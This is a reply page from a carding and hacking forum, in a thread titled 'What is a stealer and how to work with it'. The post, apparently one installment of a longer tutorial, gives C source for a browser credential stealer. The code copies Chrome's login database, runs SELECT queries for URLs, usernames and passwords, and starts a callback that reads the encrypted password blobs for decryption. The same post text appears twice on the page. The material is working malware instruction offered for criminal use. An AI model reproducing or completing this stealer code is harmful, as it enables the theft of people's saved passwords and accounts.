Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
What is a stealer and how to work with it
Message
<blockquote data-quote="Ghosthunter" data-source="post: 548" data-attributes="member: 6"><p>Code:</p><p>int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);</p><p></p><p>if (!status) {</p><p></p><p> // return 0;</p><p></p><p>}</p><p></p><p>Now we connect to the database with the sqlite3_open_v2 command. Its prototype:</p><p></p><p>Code:</p><p>int sqlite3_open_v2(</p><p></p><p> const char *filename, /* Database filename (UTF-8) */</p><p></p><p> sqlite3 **ppDb, /* OUT: SQLite db handle */</p><p></p><p> int flags, /* Flags */</p><p></p><p> const char *zVfs /* Name of VFS module to use */</p><p></p><p>);</p><p></p><p></p><p>First argument is our database; connection information is returned in the second argument, then the open flags are passed, and the fourth argument defines the operating system interface that should use this database connection. In our case, it is not needed. If this function works correctly, the SQLITE_OK value is returned, otherwise an error code is returned.</p><p></p><p>Code:</p><p>sqlite3 *sql_browser_db = NULL;</p><p></p><p>status = sqlite3_open_v2(TEMP_DB_PATH,</p><p></p><p> &sql_browser_db,</p><p></p><p> SQLITE_OPEN_READONLY,</p><p></p><p> NULL);</p><p></p><p>if(status != SQLITE_OK) {</p><p></p><p> sqlite3_close(sql_browser_db);</p><p></p><p> DeleteFile(TEXT(TEMP_DB_PATH));</p><p></p><p></p><p>Now we start directly processing the data in the database. To do this, use the sqlite3_exec () function.</p><p></p><p>Code:</p><p>status = sqlite3_exec(sql_browser_db,</p><p></p><p> "SELECT origin_url, username_value, password_value FROM logins",</p><p></p><p> crack_chrome_db,</p><p></p><p> sql_browser_db,</p><p></p><p> &err);</p><p></p><p>if (status != SQLITE_OK)</p><p></p><p> return 0;</p><p></p><p>This function has a prototype like this:</p><p></p><p>Code:</p><p>int sqlite3_exec(</p><p></p><p> sqlite3*, /* An open database */</p><p></p><p> const char *sql, /* SQL to be evaluated */</p><p></p><p> int (*callback)(void*,int,char**,char**), /* Callback */</p><p></p><p> void *, /* 1st argument to callback */</p><p></p><p> char **errmsg /* Error msg written here */</p><p></p><p>);</p><p></p><p>The first argument is our password database, the second is an SQL command that pulls out the file URL, username, password, and username, the third argument is a callback function that will decrypt passwords, the fourth argument is passed to our callback function, and the fifth argument reports an error.</p><p></p><p>Let's take a closer look at the callback function that decrypts passwords. It will be applied to each row in the selection of our SELECT query. Its prototype is int (*callback) (void*, int,char**, char**), but we don't need all the arguments, although they should be declared. Let's call the function itself crack_chrome_db, and start writing and declaring the necessary variables:</p><p></p><p>Code:</p><p>int crack_chrome_db(void *db_in, int arg, char **arg1, char **arg2) {</p><p></p><p>DATA_BLOB data_decrypt, data_encrypt;</p><p></p><p>sqlite3 *in_db = (sqlite3*)db_in;</p><p></p><p>BYTE *blob_data = NULL;</p><p></p><p>sqlite3_blob *sql_blob = NULL;</p><p></p><p>char *passwds = NULL;</p><p></p><p>while (sqlite3_blob_open(in_db, "main", "logins", "password_value", count++, 0, &sql_blob) != SQLITE_OK && count <= 20 );</p><p></p><p>In this loop, we create a BLOB (i.e., a large array of binary data). Next, we allocate memory, read the blob, and initialize the DATA_BLOB fields:</p><p></p><p>Code:</p><p>int sz_blob;</p><p></p><p>int result;</p><p></p><p>sz_blob = sqlite3_blob_bytes(sql_blob);</p><p></p><p>dt_blob = (BYTE *)malloc(sz_blob);</p><p></p><p>if (!dt_blob) {</p><p></p><p> sqlite3_blob_close(sql_blob);</p><p></p><p> sqlite3_close(in_db);</p><p></p><p>}</p><p></p><p>data_encrypt.pbData = dt_blob;</p><p></p><p>data_encrypt.cbData = sz_blob;</p></blockquote><p></p>
[QUOTE="Ghosthunter, post: 548, member: 6"] Code: int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE); if (!status) { // return 0; } Now we connect to the database with the sqlite3_open_v2 command. Its prototype: Code: int sqlite3_open_v2( const char *filename, /* Database filename (UTF-8) */ sqlite3 **ppDb, /* OUT: SQLite db handle */ int flags, /* Flags */ const char *zVfs /* Name of VFS module to use */ ); First argument is our database; connection information is returned in the second argument, then the open flags are passed, and the fourth argument defines the operating system interface that should use this database connection. In our case, it is not needed. If this function works correctly, the SQLITE_OK value is returned, otherwise an error code is returned. Code: sqlite3 *sql_browser_db = NULL; status = sqlite3_open_v2(TEMP_DB_PATH, &sql_browser_db, SQLITE_OPEN_READONLY, NULL); if(status != SQLITE_OK) { sqlite3_close(sql_browser_db); DeleteFile(TEXT(TEMP_DB_PATH)); Now we start directly processing the data in the database. To do this, use the sqlite3_exec () function. Code: status = sqlite3_exec(sql_browser_db, "SELECT origin_url, username_value, password_value FROM logins", crack_chrome_db, sql_browser_db, &err); if (status != SQLITE_OK) return 0; This function has a prototype like this: Code: int sqlite3_exec( sqlite3*, /* An open database */ const char *sql, /* SQL to be evaluated */ int (*callback)(void*,int,char**,char**), /* Callback */ void *, /* 1st argument to callback */ char **errmsg /* Error msg written here */ ); The first argument is our password database, the second is an SQL command that pulls out the file URL, username, password, and username, the third argument is a callback function that will decrypt passwords, the fourth argument is passed to our callback function, and the fifth argument reports an error. Let's take a closer look at the callback function that decrypts passwords. It will be applied to each row in the selection of our SELECT query. Its prototype is int (*callback) (void*, int,char**, char**), but we don't need all the arguments, although they should be declared. Let's call the function itself crack_chrome_db, and start writing and declaring the necessary variables: Code: int crack_chrome_db(void *db_in, int arg, char **arg1, char **arg2) { DATA_BLOB data_decrypt, data_encrypt; sqlite3 *in_db = (sqlite3*)db_in; BYTE *blob_data = NULL; sqlite3_blob *sql_blob = NULL; char *passwds = NULL; while (sqlite3_blob_open(in_db, "main", "logins", "password_value", count++, 0, &sql_blob) != SQLITE_OK && count <= 20 ); In this loop, we create a BLOB (i.e., a large array of binary data). Next, we allocate memory, read the blob, and initialize the DATA_BLOB fields: Code: int sz_blob; int result; sz_blob = sqlite3_blob_bytes(sql_blob); dt_blob = (BYTE *)malloc(sz_blob); if (!dt_blob) { sqlite3_blob_close(sql_blob); sqlite3_close(in_db); } data_encrypt.pbData = dt_blob; data_encrypt.cbData = sz_blob; [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
What is a stealer and how to work with it
Top